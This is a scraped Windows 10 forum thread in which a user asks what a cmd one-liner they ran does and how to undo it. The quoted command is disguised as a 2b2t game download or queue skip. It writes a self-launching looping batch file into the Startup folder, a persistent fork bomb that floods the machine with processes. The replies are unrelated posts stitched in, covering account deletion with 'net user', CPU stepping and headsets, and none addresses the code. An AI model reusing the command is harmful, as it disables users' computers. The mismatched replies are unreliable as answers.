Windows 10: I need to know what this code does

Discus and support I need to know what this code does in Windows 10 Network and Sharing to solve the problem; So I put this code into my cmd at one point and know its causing problems i need to know what it does and how to undo it echo... Discussion in 'Windows 10 Network and Sharing' started by GavinDavis2, Jul 24, 2019.

1. I need to know what this code does

So I put this code into my cmd at one point and know its causing problems i need to know what it does and how to undo it

echo 2b2t.org_Download_2b2tsourcecode & (echo :top & echo.start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2b2tqueueskip.bat" & echo.start & echo.goto top)>"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2b2tqueueskip.bat" && start "" "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2b2tqueueskip.bat"

:)

GavinDavis2, Jul 24, 2019
  2. Vesao Win User

Remove account

I suggest you backup your personalized files first before removing the account.
    To delete an account, follow these steps:
    1. Press WIN + X keys and click Command Prompt (Admin) from the menu.
    2. Type the following command and press Enter. Replace test with the name of your sister's account. Code:
      Code:
      net user test /del

Vesao, Jul 24, 2019
  3. trt740 Win User
    Post your source for the best Stepping for Amd 64's and Optys

Post your Stepping and o/c for Amd 64's Am2 /939 and Optys

can anyone point me in the direction of a good site which lists stepping codes for which cpu's over clock the best

trt740, Jul 24, 2019
  4. cadaveca Win User

I need to know what this code does

Good surround sound headset

I know you say you're not that guy, but stepping into the $250+ range really brings a change in build quality that might have you never having to buy another set. Otherwise, getting 6 speakers with decent sound in a headset is hard, and that's what you are asking for, and I have no suggestions, but just a bump up the list. *Stick Out Tongue I need to know what this code does :p

cadaveca, Jul 24, 2019
Thema:

I need to know what this code does

1. I need to know what this code does - Similar Threads - need code does

2. Does anyone know what this is?

in Windows 10 Gaming
    Does anyone know what this is?: can this be malware? I have fully scanned my pc but nothing showed up and tried finding what this is but cant seem to find it anywhere in the task manager or services. my pc has been under performing lately my cpu usage has always been high when all i got open was a...
  3. Does anyone know what this is?

in Windows 10 Software and Apps
    Does anyone know what this is?: can this be malware? I have fully scanned my pc but nothing showed up and tried finding what this is but cant seem to find it anywhere in the task manager or services. my pc has been under performing lately my cpu usage has always been high when all i got open was a...
  4. Does anyone know what this is?

in AntiVirus, Firewalls and System Security
  5. Does somebody know what Is the weird qr Code?

in Windows 10 Gaming
    Does somebody know what Is the weird qr Code?: My laptop today suddenly went dark and only bright icons were showing on it. I turned it off then turned it on and now im seeing a weird qr Code that i couldnt scan with my phone probably because The screen Is too dark. Does anybody know what kind of problem this Is? My...
  6. Does somebody know what Is the weird qr Code?

in Windows 10 Software and Apps
    Does somebody know what Is the weird qr Code?: My laptop today suddenly went dark and only bright icons were showing on it. I turned it off then turned it on and now im seeing a weird qr Code that i couldnt scan with my phone probably because The screen Is too dark. Does anybody know what kind of problem this Is? My...
  7. Does anyone know what is this?

in Windows 10 Ask Insider
    Does anyone know what is this?: [ATTACH] submitted by /u/copZ97 [link] [comments] https://www.reddit.com/r/Windows10/comments/l62i5z/does_anyone_know_what_is_this/
  8. Does anyone knows what is it?

in Windows 10 Customization
    Does anyone knows what is it?: Does anyone knows what is it showing on the picture. It keeps happening when I'm playing game. I play FPS, it might be the tab, cap locks, shift keys of some kind of combination. When it happens whenever key I press, it will force the game to go to the desktop. Most of the it...
  9. I need to know what this icon means

in Windows 10 Customization
    I need to know what this icon means: I found this icon in the windows settings Devices bluetooth and other devices and I do not know the meaning of it.[ATTACH] https://answers.microsoft.com/en-us/windows/forum/all/i-need-to-know-what-this-icon-means/b4948d44-b755-4abc-bac5-ca79e2a8bac1
  10. Does anyone know what this is?

in Windows 10 Ask Insider
    Does anyone know what this is?: [ATTACH] Weird multiplying tabs that I can only see in task manager keep randomly showing up and they all have this logo on it. I've tried resetting my computer and looking for it in the control pannel but I cannot find anything. I close them only for 10 more to appear...